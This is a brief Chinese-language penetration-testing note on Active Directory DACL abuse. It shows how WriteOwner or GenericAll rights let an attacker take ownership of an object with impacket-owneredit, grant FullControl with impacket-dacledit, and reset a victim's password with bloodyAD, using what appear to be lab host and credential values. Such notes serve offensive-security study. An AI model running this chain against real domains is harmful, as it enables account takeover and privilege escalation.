6.Grant ownership

created: "2025-05-25 23:56"
tags:
  - DACL_abuse
Type:
  - Note
aliases:
  - Grant ownership
updated: "2025-06-28 16:24"

1. 利用

1.1. 利用条件

这种滥用行为可以在攻击者控制一个对任何对象拥有 WriteOwner 或 GenericAll 权限的对象时执行。
如： Pasted image 20250627134551

1.2. 利用工具

1.2.1. Impacket 套件

对于上面 WriteOwner 权限时，可以先提升到 GenericAll 权限，然后修改密码即可

#先更改对象的所有权
impacket-owneredit -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'

#授予自己 GenericAll 权限
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'

#后续后修改目标的密码
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u 'sam' -p 'Admin123!' set password  john Admin123!

修改后的DACL
Pasted image 20250627141049
Pasted image 20250628163120